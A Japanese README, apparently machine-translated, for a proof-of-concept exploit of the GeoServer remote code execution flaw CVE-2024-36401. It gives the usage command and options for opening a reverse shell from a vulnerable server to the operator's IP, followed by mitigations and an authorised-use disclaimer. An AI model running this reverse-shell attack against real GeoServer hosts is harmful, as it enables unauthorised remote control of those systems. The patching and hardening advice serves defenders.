
CVE-2024-36401のPOC。このPOCは、vlun標的からリバースシェルを確立しようとします。
CVE-2024-36401 GeoServer 用の POC。この POC は、ターゲットからリバースシステムシェルを確立しようとします。

CVE-2024-36401 の POC: GeoServer バージョン 2.25.1、2.24.3、2.23.5 より前の GeoServer 用の RCE。この POC は、phith0n によるセキュリティアドバイザリに基づいています。
この POC は、vlun ターゲットからのリバースシェルを確立しようとします。これは、vlun Linux ターゲットに対して動作することを目的としています。この POC を実行するには、公開されアクセス可能な IP を持つマシンが必要です。
requests ライブラリこの POC を単一のターゲットに対して使用する場合:
python CVE-2024-36401.py -u HTTP://TARGET:9090 -ip YOUR-IP -port LOCAL-PORT-NUMBER -type GeoServer-Object-Type
ヘルプ:
python3 CVE-2024-36401.py -h
options:
-h, --help show this help message and exit
-u U Target, example https://target:8080
-ip IP Your IP, example 192.168.1.1
-port PORT Port, example 1337
-type TYPE Type, example sf:archsites
1- WFS リクエストを無効にします。
2- iptables を設定してリバース接続を無効にし、デフォルトポリシーをすべてのトラフィックをドロップに設定し、確立済みおよび関連する接続を許可し、DNS、HTTP、HTTPS などの必要なアウトバウンドトラフィックのみを許可することで、Linux をセキュリティ保護します。
3- または、GeoServer の最新バージョンにアップグレードします。
ご提案やご意見がありましたら、私 までご連絡ください。
私は楽しみ、仕事、教育目的でのみ独自のツールを作成します。ハッキングやシステムやネットワークへの不正アクセスを支持または推奨するものではありません。ツールは責任を持って、テストする明確な許可があるシステムでのみ使用してください。